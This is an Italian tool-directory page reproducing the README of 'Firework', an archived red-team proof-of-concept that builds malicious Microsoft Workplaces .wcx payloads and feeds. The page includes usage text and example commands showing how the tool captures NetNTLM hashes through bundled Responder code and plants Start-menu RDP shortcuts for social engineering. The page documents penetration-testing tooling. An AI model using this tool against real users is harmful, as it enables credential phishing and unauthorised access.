Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Firework — Firework è uno strumento proof of concept per interagire con Microsoft Workplaces creando file validi necessari per il processo di provisioning. | Kitploit
Strumenti/GitHubGitHub/spiderlabs/firework
OSINT per Ingegneria SocialeGenerazione di PayloadPhishingPenetration TestingCommand and ControlIngegneria SocialeAutenticazioneRed TeamingArchived
GitHubspiderlabs/firework

Firework

Firework è uno strumento proof of concept per interagire con Microsoft Workplaces creando file validi necessari per il processo di provisioning.

43106 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
Sito web

⚠️ NOTA: Questo strumento non è più in manutenzione attiva.

Firework

alt text

Firework è uno strumento proof of concept per interagire con Microsoft Workplaces creando file validi richiesti per il processo di provisioning. Lo strumento include anche del codice di Responder per sfruttare la sua capacità di catturare hash NetNTLM da un sistema che effettua il provisioning di un feed Workplace tramite esso.

Questo strumento può essere utilizzato come parte di un penetration test o di un esercizio red team per creare un payload .wcx (e il feed associato) che, se cliccato, potrebbe essere utilizzato per:

  • Phishing di credenziali - Gli hash NetNTLM verranno inviati se un utente inserisce le proprie credenziali (o su versioni precedenti di Windows automaticamente).
  • Aggiungere elementi al menu Start - Dopo la configurazione, vengono aggiunte scorciatoie al menu Start che avviano i file RDP serviti. Queste voci potrebbero potenzialmente essere utilizzate come parte di una campagna di social engineering più ampia.
  • Scaricare risorse - Risorse come i file .rdp e i file icona vengono scaricate e aggiornate da Windows su base giornaliera (se l'autenticazione del feed è disabilitata o soddisfatta).

Leggi il blog di SpiderLabs per un riepilogo e una guida più dettagliati.

Installazione

  • Testato con Python 2.7.x. (Python3 attualmente non supportato, anche se la classe principale Firework potrebbe essere utilizzata in Python 3)
root@kitploit:~
$ pip install -r requirements.txt
  • Lo strumento serve contenuti su HTTPS e richiede un certificato e una chiave privata per utilizzare il server web integrato con la cattura NetNTLM. File predefiniti: cert.crt e key.pem

Utilizzo

root@kitploit:~

.-:::::'::::::::::..  .,::::::.::    .   .:::  ...    :::::::..    :::  .   
;;;'''' ;;;;;;;``;;;; ;;;;''''';;,  ;;  ;;;'.;;;;;;;. ;;;;``;;;;   ;;; .;;,.
[[[,,== [[[ [[[,/[[['  [[cccc  '[[, [[, [[',[[     \[[,[[[,/[[['   [[[[[/'  
`$$$"`` $$$ $$$$$$c    $$""""    Y$c$$$c$P $$$,     $$$$$$$$$c    _$$$$,    
 888    888 888b "88bo,888oo,__   "88"888  "888,_ _,88P888b "88bo,"888"88o, 
 "MM,   MMM MMMM   "W" """"YUMMM   "M "M"    "YMMMMMP" MMMM   "W"  MMM "MMP"


usage: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN]
                   [-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH]
                   [-t CERT] [-k KEY]

WCX workplace tool

optional arguments:
  -h, --help            show this help message and exit
  -c COMPANY, --company COMPANY
                        Company name
  -u URL, --url URL     Feed URL
  -a APP, --app APP     App Name
  -e EXT, --ext EXT     App Extension
  -i ICON, --icon ICON  App Icon
  -l LISTEN, --listen LISTEN
                        TLS Web Server Port
  -r RDP, --rdp RDP     RDP Server
  -d DOMAIN, --domain DOMAIN
                        RDP Domain
  -n USERNAME, --username USERNAME
                        RDP Username
  -p PASSWORD, --password PASSWORD
                        RDP Password
  -t CERT, --cert CERT  SSL cert
  -k KEY, --key KEY     SSL key

Esempi

Esempio base:

  • Nome dell'organizzazione: EvilCorp
  • URL del feed XML (o URL del server integrato di Firework): https://example.org/ - Qui è dove Windows scarica il feed.
  • Nome dell'applicazione: Firework
  • Estensione del file: .fwk
  • File icona: firework.ico
root@kitploit:~
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico 

Il server web integrato si avvierà sulla porta 443 se cert.crt e key.pem sono presenti nella directory corrente. Questo forzerà una richiesta NTLM con responder. Se questi file non sono presenti, lo strumento scriverà tutti i file nella directory locale per il tuo hosting personale.

Se desideri avviare il server web integrato su una porta alternativa, usa il flag -l come sotto:

root@kitploit:~
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -l 8443

Puoi anche aggiungere alcune personalizzazioni al file .rdp che viene servito.

  • Server Desktop remoto: dc.corp.local
  • Dominio: corp.local
  • Nome utente: admin
  • Password crittografata: Password crittografata che viene inclusa nel file RDP

Nota: Le password memorizzate nei file .rdp vengono probabilmente ignorate in una configurazione predefinita.

root@kitploit:~
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -r dc.corp.local -d corp.local -n admin -p <crypt password>

Payload

Dopo aver eseguito lo strumento, 'payload.wcx' verrà scritto nella directory corrente. Questo file è ciò che, quando cliccato, avvia il processo di provisioning.

Autori

  • David Middlehurst - Twitter- @dtmsecurity

Licenza

Firework

Creato da David Middlehurst Copyright (C) 2018 Trustwave Holdings, Inc.

Questo programma è software libero: puoi ridistribuirlo e/o modificarlo secondo i termini della GNU General Public License pubblicata dalla Free Software Foundation, versione 3 della Licenza, o (a tua scelta) qualsiasi versione successiva.

Questo programma è distribuito nella speranza che sia utile, ma SENZA ALCUNA GARANZIA; senza neppure la garanzia implicita di COMMERCIABILITÀ o IDONEITÀ PER UN PARTICOLARE SCOPO. Vedere la GNU General Public License per maggiori dettagli.

Riconoscimenti

  • Responder by Laurent Gaffie
  • Firework Icon
Scarica lo strumento